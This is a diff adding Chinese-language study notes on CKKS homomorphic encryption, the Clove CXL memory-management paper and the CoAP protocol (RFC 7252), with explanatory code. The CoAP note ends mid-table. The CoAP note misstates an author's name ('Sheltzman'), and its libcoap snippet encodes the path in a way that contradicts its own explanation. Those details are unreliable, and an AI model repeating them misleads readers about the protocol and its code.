安全参数做 benchmark)。 + +## 与 BFV/BGV 怎么选 + +| 维度 | CKKS | BFV / BGV | +|------|------|-----------| +| 明文 | 近似实数/复数 | 精确整数 | +| 解密 | `m + e` | `m + t·e` 或带 `q/t` 缩放 | +| 乘法后 | Rescale 降精度 | Modulus switching / 模数链 | +| 典型场景 | 神经网络推理、统计、浮点 ML | 整数电路、比较、精确计数 | +| 误用后果 | 把工资总额当浮点近似 → 分钱级误差 | 把模型权重塞 BFV → 参数爆炸、极慢 | + +## 实践案例 + +### 案例 1:纯 Python 玩具模型——理解「噪声 + Rescale」 + +下面**不是**真正的 CKKS 实现,而是用浮点数模拟论文的核心直觉:解密得到 `m + e`,乘法放大误差,Rescale 像除以 scale 并四舍五入。 + +```python +import math + +def encrypt_approx(m: float, scale: float, noise: float) -> tuple[float, float]: + """模拟 Enc(m): 存 (scaled_message, noise),解密时 m + e/scale""" + return m * scale, noise + +def decrypt_approx(scaled_m: float, noise: float, scale: float) -> float: + return scaled_m / scale + noise / scale + +def homomorphic_add(a, b, scale): + return (a[0] + b[0], a[1] + b[1]) + +def homomorphic_mul(a, b, scale): + # (m1*scale + e1)(m2*scale + e2) ≈ m1*m2*scale^2 + cross_terms + m1, e1 = a[0] / scale, a[1] + m2, e2 = b[0] / scale, b[1] + prod_m = m1 * m2 + prod_noise = m1 * e2 + m2 * e1 + (e1 * e2) / scale # 交叉项 + return prod_m * scale * scale, prod_noise * scale + +def rescale(ct, p: float): + """除以 p 并四舍五入到整数格点,模拟 rescale_to_next""" + scaled_m = round(ct[0] / p) + scaled_noise = round(ct[1] / p) + return scaled_m, scaled_noise + +scale, p = 1024.0, 1024.0 +x, y = 3.14, 2.71 + +cx = encrypt_approx(x, scale, noise=0.5) +cy = encrypt_approx(y, scale, noise=0.3) + +# 同态乘法 + rescale +cmul = homomorphic_mul(cx, cy, scale) +cmul = rescale(cmul, p) +result = decrypt_approx(cmul[0], cmul[1], scale) + +print(f"明文: {x} * {y} = {x * y:.6f}") +print(f"同态近似: {result:.6f}") +print(f"相对误差: {abs(result - x * y) / (x * y):.2e}") +``` + +运行后你会看到:误差在 `1/scale` 量级,和论文「噪声跟在有效数字后面」的图景一致。真正的 CKKS 在多项式环上操作,但**Rescale 的语义**就是这里演示的「缩小幅度 + 舍入」。 + +### 案例 2:TenSEAL — 加密向量上的多项式求值 + +TenSEAL 封装 Microsoft SEAL,最适合快速体验 CKKS 的「加密浮点向量 + SIMD」。 + +```python +import tenseal as ts + +# poly_modulus_degree=8192 → 4096 个 slot;coeff_mod 链长度决定乘法深度 +context = ts.context( + ts.SCHEME_TYPE.CKKS, + poly_modulus_degree=8192, + coeff_mod_bit_sizes=[60, 40, 40, 40, 60], # 每层乘法消耗一档模数 +) +context.generate_galois_keys() # 旋转 slot 时需要 +context.global_scale = 2**40 # Δ,与 rescale 对齐 + +plain = [1.5, 2.5, 3.5, 4.5] +enc = ts.ckks_vector(context, plain) + +# 同态算 f(x) = x^2 + x(近似) +result = enc * enc + enc +decoded = result.decrypt() + +for i, (a, b) in enumerate(zip(plain, decoded)): + expected = a * a + a + print(f"slot {i}: plain={a}, hom={b:.6f}, expected={expected:.6f}") +``` + +**读代码时注意**: + +- `coeff_mod_bit_sizes` 里有几个「中间档」,大致就能做几次乘法(每次 `rescale` 掉一档) +- `global_scale` 设太大 → 噪声相对消息变小,但模数链要更长;设太小 → 精度不够 +- 解密结果和明文差在 `1/Δ` 量级是正常的,不是实现 bug + +### 案例 3:Microsoft SEAL(C++)— 手动跟踪 scale 与 rescale + +生产环境更常用 SEAL 原生 API;理解 `scale` 与 `rescale_to_next` 是读 CKKS 源码的钥匙。 + +```cpp +#include "seal/seal.h" +using namespace seal; + +size_t poly_modulus_degree = 8192; +EncryptionParameters parms(scheme_type::ckks); +parms.set_poly_modulus_degree(poly_modulus_degree); +parms.set_coeff_modulus(CoeffModulus::Create( + poly_modulus_degree, {60, 40, 40, 60})); + +SEALContext context(parms); +KeyGenerator keygen(context); +auto secret_key = keygen.secret_key(); +PublicKey public_key; +keygen.create_public_key(public_key); +RelinKeys relin_keys; +keygen.create_relin_keys(relin_keys); +Encryptor encryptor(context, public_key); +Evaluator evaluator(context); +Decryptor decryptor(context, secret_key); + +CKKSEncoder encoder(context); +double scale = pow(2.0, 40); + +std::vector input{3.0, 4.0}; +Plaintext plain; +encoder.encode(input, scale, plain); + +Ciphertext encrypted; +encryptor.encrypt(plain, encrypted); + +// 乘法:scale 变为 scale^2,必须 rescale +evaluator.multiply_inplace(encrypted, encrypted); +evaluator.relinearize_inplace(encrypted, relin_keys); +evaluator.rescale_to_next_inplace(encrypted); + +Plaintext plain_result; +decryptor.decrypt(encrypted, plain_result); +std::vector output; +encoder.decode(plain_result, output); + +// output[0] ≈ 9.0, output[1] ≈ 16.0 +``` + +**与论文对应关系**: + +- `encode(..., scale)` = 消息乘 `Δ` 再加密 +- `multiply` + `relinearize` = 同态乘 + 密钥切换 +- `rescale_to_next` = 论文的 `p⁻¹·c (mod q/p)`,scale 也除以 `p` + +### 案例 4:同态 logistic(论文动机场景) + +论文用 batching 同态算 logistic 的七阶 Taylor 近似,用于**加密基因/医疗数据的疾病风险评分**。工程上可拆成: + +1. 用案例 2 加密特征向量 +2. 预计算 Taylor 系数为明文,同态累加 `Σ cᵢ · xⁱ` +3. 每乘一次 `x` 做一次 `rescale`,提前规划模数链深度 + +若电路深度超过模数链,需要 **bootstrapping**(论文原版未强调;后续工作把 CKKS bootstrap 做到实用,OpenFHE 支持)。 + +## 踩过的坑 + +1. **把 CKKS 当精确整数加密**:账本、投票计数请用 BFV;CKKS 解密是「近似」,误差累积可审计但不可消除。 +2. **忘记 rescale**:乘法后不调 `rescale_to_next`,scale 爆炸,下一轮乘法或解密直接错。 +3. **模数链深度不够**:规划电路时数清楚「几次乘法」,每档 `coeff_modulus` 通常支撑一次乘法+rescale。 +4. **slot 数误算**:`poly_modulus_degree = N` 时 slot 数是 **N/2**,不是 N。 +5. **混淆 CKKS 与 HEAAN 商标**:HEAAN 是韩国 CryptoLab 的实现名;算法统称 CKKS;Microsoft SEAL / OpenFHE 实现的是同一方案族,参数不互通。 +6. **忽略 bootstrapping 成本**:无限深度电路需要 bootstrap,单次仍可能秒级——和论文里「浅电路 + rescaling」的毫秒级不是一回事。 + +## 适用 vs 不适用 + +**适用**: + +- 云端推理(加密输入 + 明文或加密权重) +- 联邦学习里的安全聚合(近似梯度) +- 统计分析(均值、方差、回归系数)——容忍 `10⁻⁶` 级误差 +- 学习 HE 栈:CKKS API 是工业文档最丰富的入口 + +**不适用**: + +- 精确金融记账、加密货币余额 +- 需要密文比较 / 分支(CKKS 不原生支持,要配合其他原语) +- 超低延迟在线服务(毫秒级单 op 可接受,但大模型全链路仍慢几个数量级) +- 不做参数审计就上生产(80-bit 论文 benchmark ≠ 128-bit 产品要求) + +## 历史小故事 + +- 论文 **eprint 2016/421** 先挂 IACR ePrint,HEAAN 库 2016 年 5 月已在 GitHub 开源——实现领先正式发表。 +- 名称 **CKKS** 来自四位作者姓氏 Cheon-Kim-Kim-Song;第二、三位 Kim 是不同研究者。 +- ASIACRYPT 2017 发表后,CKKS 迅速成为 **隐私机器学习** 默认 HE 方案;BFV 仍在整数场景活跃。 +- 论文把加密噪声重新定义为「误差的一部分」,影响后续 **近似 FHE** 整条线(含 bootstrap 综述里对 CKKS 的专门章节)。 + +## 学到什么 + +- **同态加密不止一条路线**:精确整数(BFV/BGV)与近似实数(CKKS)解决不同问题,选型先于调参。 +- **Rescaling 是 CKKS 相对 modulus switching 的概念创新**:不是简单换模数,而是**对齐浮点舍入语义**。 +- **SIMD batching + 典范嵌入** 让一次密文算一整条向量,论文里 logistic 加速主要来自这里。 +- **安全与精度一起规划**:模数链、scale、噪声预算要在加密前画电路深度表。 +- 读实现时盯住三个词:`scale`、`relinearize`、`rescale`——它们几乎就是论文 Algorithm 1–3 的代码化。 + +## 延伸阅读 + +- 原文 PDF:[eprint.iacr.org/2016/421](https://eprint.iacr.org/2016/421.pdf) +- HEAAN 原始库:`github.com/snucrypto/HEAAN` +- Microsoft SEAL 文档:CKKS 编码与 rescaling 章节 +- [[brakerski-bgv-2012]] —— 模数切换与层级 FHE +- [[ducas-dilithium-2018]] —— 同站后量子密码笔记(格密码另一应用:签名) +- [[rsa-1978]] —— 公钥密码范式起源 + +## 关联 + +- [[brakerski-bgv-2012]] —— BGV:精确整数 + 模数切换 +- [[ducas-dilithium-2018]] —— 格密码签名 +- [[rsa-1978]] —— 公钥密码范式起源 +- [[signal-double-ratchet-2016]] —— 端到端加密另一路线(对称 + DH,非同态) + +## 维护备注 + +- `来源` 字段指向 eprint PDF;正式会议版本见 ASIACRYPT 2017。 +- 分类由 `node scripts/classify-notes.mjs --apply --area=papers` 维护。 diff --git a/src/content/docs/papers/clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370.md b/src/content/docs/papers/clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370.md new file mode 100644 index 000000000..4d21fed36 --- /dev/null +++ b/src/content/docs/papers/clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370.md @@ -0,0 +1,335 @@ +--- +title: Clove — Object-Level CXL Memory Management in Managed Runtimes +来源: https://arxiv.org/abs/2605.20370 +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +# Clove:在托管运行时中进行对象级 CXL 内存管理 + +## 零、写在前面:这篇笔记怎么读 + +这篇笔记面向零基础读者。我们不会一上来就扔术语,而是从一个日常类比开始,再逐步深入到技术细节。每个新概念出现时,我都会问自己一个问题并马上回答,让你不需要猜。 + +--- + +## 一、日常类比:书架与快递仓库 + +想象你经营一家快递公司,仓库里有两个区域: + +- **快速区**(靠近门口,拿货快,但面积小) +- **慢速区**(远离门口,拿货慢,但空间大) + +你的仓库用"货架格"(4KB 页面)来划分区域。每个货架格上可能放着几件不同的包裹(对象)。问题在于: + +> 热门包裹和冷门包裹经常混放在同一个货架格里。 + +如果你想把热门包裹放到快速区,你必须把**整个货架格**搬过去。结果就是:快速区被很多冷门包裹占满了,热门包裹反而挤在慢速区。 + +**Clove 的想法是:** 不要按"货架格"管理,而是按"包裹"来管理。热门的小包裹单独放进快速区,冷门的大包裹留在慢速区。这样快速区的利用率大幅提高。 + +在计算机里: +- 快速区 = 本地 DDR 内存(快但贵且小) +- 慢速区 = CXL 扩展内存(慢一些但便宜且大) +- 包裹 = 程序中的对象(Java object) +- 货架格 = 操作系统页面(4KB 或 2MB) + +--- + +## 二、背景知识:CXL 是什么? + +**CXL**(Compute Express Link)是一种芯片间互联技术,允许 CPU 连接额外的内存设备。它让服务器可以"插内存条"来扩展容量,同时保持和主内存一样的访问方式(普通的 load/store 指令)。 + +CXL 内存比本地内存慢大约 2-4 倍,这比过去的"网络附加存储"快得多。但也正因为 CXL 很快,**管理开销**很容易抵消它带来的好处。 + +--- + +## 三、核心概念 + +### 3.1 页面内热度偏斜(Intrapage Hotness Skew) + +这是 Clove 要解决的核心问题。 + +想象一个 4KB 的页面,里面存放了 10 个对象: + +| 对象 | 大小 | 访问频率 | +|------|------|----------| +| A | 32B | 非常高(每毫秒被访问 100 次)| +| B | 32B | 非常高 | +| C | 32B | 非常高 | +| D | 32B | 极低(一天才被访问 1 次)| +| ... | ... | ... | +| J | 32B | 极低 | + +如果操作系统按页面来管理,它只有两个选择:把整个 4KB 页面搬到快速内存,或者留在慢速内存。它无法只搬 A、B、C 而留下 D-J。这就是页面内热度偏斜——**一个页面内,不同对象的热度差异巨大**。 + +### 3.2 托管运行时(Managed Runtime) + +Java、.NET 等语言的运行时(JVM、CLR)已经做了很多"免费"的工作: + +1. **垃圾回收(GC)**:自动移动对象来压缩堆内存 +2. **JIT 编译**:在运行时动态生成和优化机器码 +3. **对象元数据**:每个对象头部存储类型信息、锁信息等 + +Clove 的洞察是:这些已有的机制天然适合做对象级内存管理,不需要从零开始。 + +### 3.3 对象热度追踪(Object Hotness Tracking) + +Clove 需要知道哪些对象是"热的"(经常被访问的)。但直接追踪每个对象太慢了。 + +**Clove 的聪明做法:** + +1. 用硬件性能计数器(PEBS)采样,找出导致 L3 缓存 misses 最多的**几条加载指令** +2. 只在这些"有问题"的指令处插入追踪代码 +3. 对象头部原本就有的闲置 bit 被拿来存热度计数器 + +这个方法的关键是:**不需要追踪所有对象,只需要追踪那些真正有问题的对象。** + +### 3.4 热对象压缩(Hot-Object Compaction) + +知道哪些对象热之后,Clove 需要把它们移到快速区。它的做法是: + +1. 在垃圾回收过程中,把热对象"挤"到一起,放在连续的虚拟页面上 +2. 底层的页面级系统(如 Memtis)看到这些页面变热后,自动把它们搬到物理快速内存 + +Clove 不直接管理物理内存放置,而是通过"把热对象集中到少数页面"这个间接方式,让现有的页面级系统来完成最后的搬迁。 + +--- + +## 四、代码示例 + +### 4.1 示例一:热度计数器是如何被更新的 + +Clove 利用对象头部的闲置 bit 来存储热度计数器。以下是简化后的概念性代码: + +```java +// 每个 Java 对象头部原本存储: +// [ 23 bits 哈希码 | 1 bit 标志位 | 5 bit GC 年龄 | ... ] +// Clove 复用了一些闲置位来存热度计数器 + +class HotObject { + // 对象头部(由 JVM 管理,程序员看不到) + // +---+---+---+---+---+---+---+---+ + // | 哈希码 | 标志 | GC年龄 |热度计数| + // +---+---+---+---+---+---+---+---+ + + String key; + byte[] value; + + // 假设热度计数器藏在对象头部的某个闲置位中 + // 每次对象被访问,Clove 生成的代码会做: + // + // 伪代码(对应生成的机器码): + // + // load r1, [object_ptr] // 加载对象头部 + // add r2, r1, #HOTNESS_OFFSET // 指向热度计数字段 + // increment [r2] // 计数器 +1(非常轻量!) + // load r3, [object_ptr + DATA] // 访问实际数据 + // + // 这个 increment 只需要 1-2 条指令,且对象头部通常已经在 L1 缓存中 +} + +// 实际使用场景中,程序员写的代码完全不变: +public class KeyValueCache { + private Map cache = new HashMap<>(); + + public byte[] get(String key) { + return cache.get(key); // 这行代码背后的对象访问 + // 会被 Clove 自动追踪热度,程序员无需修改 + } + + public void put(String key, byte[] value) { + cache.put(key, value); + } +} +``` + +关键点: + +- 程序员**完全不需要**修改代码 +- Clove 在编译时自动注入追踪逻辑 +- 计数器更新开销极低(几纳秒),因为对象头部已经在 L1 缓存中 + +### 4.2 示例二:热度感知的热对象压缩过程 + +以下是简化后的核心逻辑,展示 Clove 如何在垃圾回收过程中做热对象压缩: + +```java +// 伪代码:Clove 扩展 ZGC 的垃圾回收流程 + +class CloveGC extends ZGC { + + // 第一阶段:对象图遍历(GC 本来就有的) + // Clove 在此阶段收集所有对象的热度统计 + void objectGraphScan() { + // 遍历堆中所有存活对象 + for (Object obj : liveObjects) { + int hotness = readHotnessCounter(obj.header); // 读取热度 + + // 把热度值映射到直方图的 bin 中 + // 使用指数级 bin:[2^0, 2^1), [2^1, 2^2), [2^2, 2^3), ... + int bin = exponentialBucket(hotness); + + // 累计每个 bin 中的对象大小 + histogram[bin] += obj.size; + } + + // 根据直方图和本地内存大小,计算"热度 cutoff" + // 例如本地内存有 20GB,从最热的 bin 开始累加, + // 直到填满 20GB,这些 bin 中的对象被归类为"热" + int cutoff = computeCutoff(histogram, localMemorySize); + } + + // 第二阶段:区域选择(Clove 新增的策略) + void selectRegionsForCompaction() { + for (Region region : heapRegions) { + float hotRatio = region.hotBytes / region.totalBytes; + + // 低水位 5%:如果一个区域热对象比例低于 5%,跳过 + // 高水位 50%:如果一个区域热对象比例超过 50%,跳过 + // 只处理"中间地带"的区域——有优化空间但还没那么热 + if (hotRatio >= LOW_WATERMARK && hotRatio <= HIGH_WATERMARK) { + region.markForHotCompaction(); + } + } + } + + // 第三阶段:热对象压缩(复用 GC 的已有移动机制) + void compactHotObjects() { + for (Region region : regionsMarkedForCompaction) { + for (Object obj : region.objects) { + if (isHot(obj.header, hotnessCutoff)) { + // 把热对象移动到"热对象空间" + // (连续的虚拟页面,便于页面级系统迁移到快速内存) + evacuateToHotSpace(obj); + } else { + // 冷对象留在原处 + evacuateToColdSpace(obj); + } + } + } + } +} + +// 假设本地内存有 20GB,直方图统计如下: +// +// Bin 热度范围 累计大小 结论 +// --- ---------- -------- ------ +// 7 128~256 2GB ← 热(累计 2GB) +// 6 64~128 3GB ← 热(累计 5GB) +// 5 32~64 4GB ← 热(累计 9GB) +// 4 16~32 5GB ← 热(累计 14GB) +// 3 8~16 6GB ← 热(累计 20GB = 填满本地内存!) +// 2 4~8 3GB ← 冷(超过 20GB 了) +// 1 2~4 2GB ← 冷 +// 0 0~2 1GB ← 冷 +// +// 所以 cutoff 设在 bin 3 和 bin 2 之间: +// bin 3 及以上的对象被认为是"热的",会被压缩到热对象空间 +// bin 2 及以下的对象被认为是"冷的",留在原处 +// +// 这样本地内存(20GB)被最热的那些对象填满了, +// 底层的页面级系统(如 Memtis)看到这些页面活跃后, +// 自动把它们搬到物理快速内存中。 +``` + +--- + +## 五、Clove 的整体架构 + +``` + +---------------------------+ + | 你的 Java 代码 | + | (完全不需要修改) | + +-------------+-------------+ + | + v ++-----------------------------------------------------------------+ +| JVM(扩展过的 OpenJDK 21) | +| | +| +---------------+ +-------------------+ +-----------------+ | +| | 在线分析器 | | 对象热度追踪 | | 热对象压缩 | | +| | (PEBS 采样) |--| (C2 JIT 注入代码) |--| (扩展 ZGC) | | +| +---------------+ +-------------------+ +-----------------+ | +| | | | | +| v v v | +| 找出有问题的加载指令 在指令处插入计数器更新 把热对象挤一起 | ++-----------------------------------------------------------------+ + | + v ++-----------------------------------------------------------------+ +| 操作系统(页面级系统,如 Memtis / TPP / HybridTier) | +| 检测到热页面后,自动迁移到本地 DDR 内存 | ++-----------------------------------------------------------------+ +``` + +--- + +## 六、为什么 Clove 比现有方案好? + +现有 CXL 内存管理系统(TPP、Memtis、HybridTier)都是**按页面管理**的。Clove 在三个真实 Java 应用上的测试结果: + +| 应用 | 性能提升(相比页面级系统) | +|------|--------------------------| +| Ehcache(键值缓存) | 延迟降低 29-63% | +| JGraphT(图算法) | 延迟降低 47-84% | +| H2(内存数据库) | 延迟降低 22-47% | + +**根本原因:** Clove 通过对象级管理解决了页面内热度偏斜问题。热点数据可以被精确地放入快速内存,而不会被冷数据"拖累"。 + +--- + +## 七、关键设计选择的权衡 + +### 7.1 为什么要用 JIT 注入而不是全程追踪? + +全程追踪每个对象访问的开销太高(约 20%)。Clove 只追踪"有问题的"加载指令(导致 L3 cache miss 的那些),开销降到 1% 以下。 + +### 7.2 为什么要分阶段而不是压缩所有热对象? + +Clove 设置了热度 cutoff 和区域水位线: +- 热度 cutoff:只压缩足够热的对象,避免热对象空间被"温"对象填满 +- 区域水位线(5%-50%):只处理那些"既不够热也不够冷"的区域,避免不必要的搬运 + +### 7.3 为什么不需要程序员写任何代码? + +因为 JVM 本身就有对象级可视化和移动能力。Clove 只是扩展了已有的机制,没有引入任何 API 或注解。 + +--- + +## 八、总结 + +Clove 的核心思想可以用一句话概括: + +> **既然 JVM 已经有了对象移动和 JIT 编译的能力,为什么不直接拿来管理 CXL 内存呢?** + +它做了几件关键的事: +1. 用硬件采样 + JIT 注入做精确且轻量级的对象热度追踪 +2. 在 GC 过程中把热对象压缩到一起 +3. 让底层的页面级系统来完成最后的物理迁移 + +整个过程对程序员完全透明,不需要修改一行代码。 + +--- + +## 九、思考题(回答后再继续) + +**问:** 如果一段代码中,对象的热度会随时间变化(比如某个时刻 A 很热,另一个时刻 B 很热),Clove 的"热度计数器"机制怎么应对? + +
+点击看答案 + +Clove 有一个计数器衰减机制。每当在线分析器收集到一定数量的 L3 miss 样本后(例如 100 万个),它会触发一次对象图扫描,对所有对象的热度计数器进行衰减(乘以 1/2)。这样旧的热度信息会逐渐淡化,新的热度模式会被更好地捕捉。 + +配合定期(约每 6 分钟)的额外对象图扫描和热对象压缩阶段,Clove 可以适应热度随时间的变化。 +
+ +--- + +## 十、延伸思考 + +1. Clove 的 JVM 原型虽然只针对 Java,但论文指出同样的原理可以应用到 .NET CLR、PyPy 和 V8 等运行时 +2. Clove 不管理堆外内存(off-heap),这部分仍然由底层页面级系统管理 +3. 如果对象大小改变极快(每几秒变化),超出了 Clove 的设计范围 diff --git a/src/content/docs/papers/coap-rfc7252.md b/src/content/docs/papers/coap-rfc7252.md new file mode 100644 index 000000000..afc654f06 --- /dev/null +++ b/src/content/docs/papers/coap-rfc7252.md @@ -0,0 +1,274 @@ +--- +title: CoAP RFC 7252 — 给传感器用的「超短明信片 HTTP」 +来源: https://datatracker.ietf.org/doc/html/rfc7252 +日期: 2026-06-13 +子分类: 嵌入式与 IoT +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一栋老小区,每户门口有个**极小的信箱**(单片机、温湿度探头、门磁),供电靠纽扣电池,内存只有几十 KB,网络是慢吞吞、偶尔丢包的无线(6LoWPAN / LoRa / NB-IoT)。 + +这种设备没法跑完整的 HTTP 客户端:TCP 三次握手、几十 KB 的请求头、长连接保活,都太奢侈。它们需要的是: + +- **一张明信片就能说完**——固定 4 字节头 + 紧凑选项,整条消息常常只有十几字节; +- **寄出去不用等回信也行**——默认 UDP,不维持「电话线」; +- **真要可靠就贴回执**——可选的 CON/ACK 重传,像挂号信; +- **地址写成「/温度」「/灯/开关」**——REST 风格 URI,和 Web 思维一致。 + +**CoAP(Constrained Application Protocol,受限应用协议)** 就是 IETF 在 **2014 年 6 月** 用 [RFC 7252](https://datatracker.ietf.org/doc/html/rfc7252) 定下的这套「明信片 REST」。作者 Sheltzman, Hartke, Bormann 来自 CoRE(Constrained RESTful Environments)工作组——目标不是替代 HTTP,而是让**最弱的节点**也能参与同一套资源模型。 + +规范全文:[RFC 7252 — The Constrained Application Protocol (CoAP)](https://datatracker.ietf.org/doc/html/rfc7252) + +## 这篇规范在说什么 + +| 维度 | 内容 | +|------|------| +| 传输 | 默认 **UDP**(一报文一 CoAP 消息);可用 **DTLS** 加密(RFC 7252 §9.1) | +| 模型 | **REST**:资源用 URI 标识,方法 GET/PUT/POST/DELETE,响应带状态码 | +| 消息类型 | CON(需确认)、NON(不需确认)、ACK、RST | +| 可靠性 | 应用层对 CON 消息指数退避重传,不靠 TCP | +| 扩展 | Observe(RFC 7641)、Block-wise(RFC 7959)、组播(RFC 7390)等建立在 CoAP 之上 | + +一句话:**CoAP = 把 HTTP 的「资源 + 动词 + 状态码」压缩进 UDP 报文,并自己处理丢包与重复。** + +## 和 HTTP / MQTT 怎么选 + +| 协议 | 日常类比 | 典型场景 | +|------|----------|----------| +| **HTTP/1.1** | 挂号信 + 长电话 | 浏览器、API 网关、富客户端 | +| **CoAP** | 明信片 + 可选回执 | 传感器、Actuator、mesh 内一跳 | +| **MQTT** | 小区广播站 + 信箱 | 经 Broker 的 pub/sub、弱网海量终端 | + +若设备要**直接问某个 IP 上的 `/sensor/temp`**,CoAP 很自然;若成千上万设备只往**主题**上扔数据、由云端 Broker 转发,MQTT 更常见。二者常共存:边缘网关 **CoAP ↔ MQTT** 翻译。 + +## 核心概念一:四层报文结构 + +RFC 7252 §3 规定每条 CoAP 消息: + +``` + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +|Ver| T | TKL | Code | Message ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Token (if any, TKL bytes) ... ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Options (Zero or more) ... ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +|1 1 1 1 1 1 1 1| Payload (if any) ... ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +``` + +| 字段 | 含义 | +|------|------| +| **Ver** | 版本,必须为 `1` | +| **T (Type)** | 0=CON, 1=NON, 2=ACK, 3=RST | +| **TKL** | Token 长度 0–8 字节;用来匹配**异步**请求与响应 | +| **Code** | 请求为方法码(0.01=GET…),响应为类.细节(2.05=Content…) | +| **Message ID** | 16 位,去重 + 匹配 CON 与 ACK/RST | +| **Options** | 类型-长度-值,如 Uri-Path、Content-Format、Observe | +| **Payload** | 前有固定标记字节 `0xFF` | + +**最小消息仅 4 字节**——比 HTTP 请求行还短 orders of magnitude。在 6LoWPAN 里单帧常限 ~127 字节,CoAP 鼓励应用控制报文大小,超大体用 Block 选项分块(RFC 7959)。 + +## 核心概念二:CON / NON 与请求-响应 + +§4 .messaging 模型: + +``` +Client Server + | CON GET /temp [MID=0x7d34, Token=0x9a] + |---------------------------------------->| + | ACK [MID=0x7d34] | (空 ACK,表示「收到了」) + |<----------------------------------------| + | CON 2.05 Content [MID=0x0012, Token=0x9a, payload=23.5] + |<----------------------------------------| + | ACK [MID=0x0012] | + |---------------------------------------->| +``` + +- **CON**:像挂号信;超时未收到 ACK 会**指数退避重传**(默认参数下约 250 msg/s 上限/对端)。 +- **NON**:像普通明信片;不重传,适合高频 telemetry。 +- **ACK**:只确认「收到了这条 CON」,**不一定带业务响应**;业务响应往往是另一条 CON/NON,靠 **Token** 与请求关联。 +- **RST**:对端无法处理该 CON 时拒绝(例如选项非法)。 + +这与 TCP「字节流里顺序藏着一个 HTTP 响应」不同:CoAP 明确区分**传输层确认**与**应用层响应**,且响应可晚到、可拆成多条消息。 + +## 核心概念三:REST 方法与响应码 + +§5.8 方法码(Code 高 3 位为 0 表示请求): + +| Code | 方法 | 语义 | +|------|------|------| +| 0.01 | GET | 读取资源表示 | +| 0.02 | POST | 处理、创建子资源 | +| 0.03 | PUT | 创建/替换 | +| 0.04 | DELETE | 删除 | + +响应码沿用 HTTP 风格三位数字的**压缩版**: + +| Code | 含义 | +|------|------| +| 2.05 | Content — GET 成功带 body | +| 2.04 | Changed — PUT/POST/DELETE 成功 | +| 4.04 | Not Found | +| 4.13 | Request Entity Too Large — 常触发客户端改用 Block 传输 | + +常用选项: + +| Option | 作用 | +|--------|------| +| `Uri-Host` / `Uri-Port` / `Uri-Path` / `Uri-Query` | 拼出 `coap://host/path?query` | +| `Content-Format` | payload 类型,如 `50` = `application/json` | +| `Max-Age` | 响应可缓存秒数 | +| `ETag` / `If-Match` | 并发写与条件更新 | + +默认 UDP 端口 **5683**,DTLS 常用 **5684**。 + +## 代码示例一:Python aiocoap 读温度 + +下面用 [aiocoap](https://aiocoap.readthedocs.io/) 向假想传感器发 CON GET(库会自动处理 ACK 与 Token): + +```python +import asyncio +from aiocoap import Context, Message, GET + +async def read_temperature(): + protocol = await Context.create_client_context() + request = Message(code=GET, uri="coap://[fd00::1]/sensor/temp") + request.opt.content_format = 50 # application/json + response = await protocol.request(request).response + print(f"Code: {response.code}") # 例如 2.05 Content + print(f"Payload: {response.payload}") # b'{"c":23.5}' + +asyncio.run(read_temperature()) +``` + +要点: + +- `uri` 拆成 Host/Path 等选项由库完成; +- `.response` 等待的是**带相同 Token 的响应消息**,不是第一条 ACK; +- 弱网下库按 RFC 默认超时重传 CON。 + +## 代码示例二:用 coap-cli 手搓报文(调试向) + +安装 [coap-cli](https://www.npmjs.com/package/coap-cli) 后可直接打真实或 [coap.me](https://coap.me/) 测试服: + +```bash +# CON GET,默认端口 5683 +coap get coap://coap.me/hello + +# 指定 JSON Accept,观察响应头里的 Mid、Token +coap get -o Accept -O 50 coap://californium.eclipseprojects.io/.well-known/core + +# PUT 一小段 JSON(注意设备侧常限 payload 大小) +echo '{"on":true}' | coap put coap://[2001:db8::1]/actuator/relay1 -c 50 +``` + +`.well-known/core` 返回 **CoRE Link Format**(RFC 6690)——列出服务器有哪些资源路径,像微型站点地图: + +``` +;rt="temperature";if="sensor", +;rt="light";if="actuator" +``` + +排障时先看 **MID 是否重复**(代理或双发)、**Token 是否对得上**(别把 ACK 当最终响应)。 + +## 代码示例三:libcoap 风格的最小 C 伪代码(感受选项编码) + +嵌入式侧常用 [libcoap](https://libcoap.net/),逻辑等价于: + +```c +coap_pdu_t *request = coap_pdu_init(COAP_MESSAGE_CON, COAP_REQUEST_CODE_GET, + coap_new_message_id(session), 8 /* token len */); +coap_add_option(request, COAP_OPTION_URI_PATH, 11, (uint8_t *)"sensor/temp"); +coap_add_option(request, COAP_OPTION_URI_PATH, 4, (uint8_t *)"temp"); +coap_add_token(request, token_len, token); /* 匹配响应 */ +coap_send(session, request); + +/* 回调里:收到 2.05 且 token 相同 → 解析 payload */ +``` + +路径 `sensor/temp` 被拆成**两个** `Uri-Path` 段(不是字符串里的一个 `/` 选项)——这是新人解析 Wireshark 时常见的困惑点。 + +## Observe:订阅资源变更(RFC 7641) + +在 GET 里带上 **Observe 选项**(序号 6,空值或 0/1)可建立观察关系:服务器在资源变化时主动发 **2.05 Notification**(仍为 CON/NON + Token)。 + +``` +Client GET /temp Observe:0 ──> Server +Client <── 2.05 temp=23.1 (notification) +Client <── 2.05 temp=23.4 (notification) +Client GET /temp Observe:1 ──> 取消观察 +``` + +像给 `/temp` 办了个「变更推送」,但**没有 MQTT Broker**——是客户端与资源服务器之间的直接关系。大 payload 通知应配合 **Block2**(RFC 7959)。 + +## 安全与部署要点 + +| 话题 | RFC 7252 说法 | +|------|----------------| +| 加密 | **DTLS 1.2+** 绑在 CoAP 之下;预共享密钥 PSK 在受限设备上很常见 | +| 组播 | UDP 组播 CoAP 需单独规范(RFC 7390);注意 CON 在组播上的重传风暴 | +| IP 